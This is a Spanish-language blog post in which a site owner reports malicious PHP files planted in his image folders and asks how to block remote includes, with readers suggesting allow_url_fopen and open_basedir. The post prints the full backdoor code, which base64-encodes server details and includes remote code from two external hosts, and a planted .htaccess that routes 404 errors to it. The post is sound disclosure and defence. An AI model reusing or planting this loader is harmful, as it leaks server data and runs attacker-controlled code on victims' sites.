Oviedo José-ph
aprende, genera conocimiento y comparte
   
 
 

Malditos Scriptkiddies o seudo hackers!.

He encontrado en unas carpetas de imagenes, unos archivos con extensión PHP y con nombres de numeros aleatorios (eso creo), en donde esta el siguiente codigo:

<?
error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);

$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".
base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".
base64_encode($i).".".base64_encode($j);

if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){   
} else {
    include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);
}
?>
 

y bueno, a simple vista no significa nada a excepto de unos includes medio sospechosos!., con una cadena codificada, si descodificamos la cadena son unas URL, en donde se efectua el ataque y robo del servidor, supongo que para enviar SPAM! y mas SPAM!...., esta es la traduccion de base64 a algo entendible

base64_decode("aHR0cDovLw==") 'http://'
base64_decode("d3d3My5yc3NuZXdzLndz") 'www3.rssnews.ws'
base64_decode("d3d3My54bWxkYXRhLmluZm8=") 'www3.xmldata.info'

Ahora bien, la pregunta para solucionar eso es, alguien sabe alguna forma de desabilitar que en un include o requiere de PHP se pueda leer rutas externas mediante HTTP, HTTPS ????, y que solo pueda leer contenidos de la maquina local??.., creo que activando esa directiva podremos evitar muchos de estos ataques.

Tambien para variar he encontrado un archivo .htaccess dentro del mismo directorio de los archivos sospechosos de PHP que contiene lo siguiente:

Options -MultiViews
ErrorDocument 404 //data/phoo/45757.php

Muy ingenioso su script no??, asi por cada error 404 manda llamar su mentado script y quien sabe que tantas cochinadas haran!..,

Tambien sera algun bug del gadget Phoo del Jaws???, o sera que como es un servidor compartido, algun otro usuario esta enviando este tipo de cosas??... tendre que revisar los logs a ver si veo algo extraño., pero de mientras si tienen un server, verifiquen sus archivos!, no vaya a ser que esten infectados

oviedo | Linux - Software Libre, PHP | 26 Julio, 7:27pm
Re: Malditos Scriptkiddies o seudo hackers!.
MaoP, <> / 26 Julio, 11:22pm  
avatar

checa los flags "allow_url_fopen" y "openbase_dir"

[ Responder (0) ]
Re: Malditos Scriptkiddies o seudo hackers!.
markuz, <> / 27 Julio, 8:26am  
avatar

Ya lo puso MaoP... me ganó. Lo que me preocupa es como metieron eso ahi... y seria bueno que investigaras eso, para prevenir que te metan (nos metan) eso a quienes usamos jaws, o los usuarios que se hospedan en ese servidor.

[ Responder (0) ]

Dejar un comentario









Fuentes XML de comentario: RSS | Atom
Office OpenXML no debe ser ISO 29500

Principal


Suscribete al servicio sindicalizado de Oviedos.com.mx

Galaxia Linux

Top Blogs México

Conversación

Zulma: Feliz día pequeñito!!

Te amo!!  
oviedo: Hola Sergio, nomas me doy un tiempo ya que he estado super ocupado estos dias con el trabajo y completo el manualito de deny host!.

Saludos!.  
sergio morales: oye brother podrias terminar el tuto de deny host es muy interesante por ahi hay un error el cual
para nada serviria el deny host ya que blokearia el acces ssh

Saludos  
oviedo: Si ya ves ese Javascript con el IE no se llevan bien!! por cierto! si pones codigo Javascript para ver las contraseñas pues mas errores! jaja..., ni pex!! el Jaws bloqueo el codigo tongue.png  
erufenix: Por aquí pasando a saludar orales no pus muchos errores con javascript  
xiam: Que tal, te dejé un comentario pero no salió ni dió mensaje de error, en donde me puedo comunicar contigo?  
jesux: Saludos Olviedos, disculpa una pregunta. Como pones esos pedazos de cóface-smile-big.png igo en tus post ??  
oviedo: Ruth me temo decirte que no tengo ninguna licencia de SCO face-sad.png , porque mejor no te cambias a Linux o algun BSD??, asi no te preocupas por licencias.
Saludos  
Ruth: Hola, oye por favor, me urge una licencia del sco 5.0.7 por favor pasame la que tienes si? si? si? me super urge por favor!!!!  
lucas: les deseo lo mejor  
Zulma: Felíz día Joe face-smile.png
Te amo  
Jacqueline: Hola:
Yo tengo una parejita de xolitos, y estan super lindos tus perros, saludos desde el DF  
Phylevn: Interesante blog..
saludos face-smile-big.png  
Vael: Donde puedo descargar tu tema de jaws. También busco otros que no sean los que vienen en la instalación. Gracias. face-smile.png  
erufenix: Orales pues por aquí pasando a saludar, tenia un buen que no daba vuelta por estos lares, desde que dejo de funcar planet jaws  
FreeDownloas: Gracias por ciertas ayudas. Es un gusto ke la gente comparta conocimiento alrededor del mundo! Acabo de hacer funcionar algunos USB gadgets en VirtualBox  
pepe oviedo: Hola a todos! nuevamente funciona este mini chat!...,
Saludos desde Colima face-smile.png  
:



:

:

Escribe el código Captcha que estás viendo


Categorías

Amigos

DarkNess-Lord
Damog
Exal
Flash BlackFire - Pchan
Mis Algoritmos
Planeta Linux MX
Andum
Almsx
Amax
Lee Colima

Información personal

Mi musica
 
  © Oviedo José-ph
Powered by Jaws Project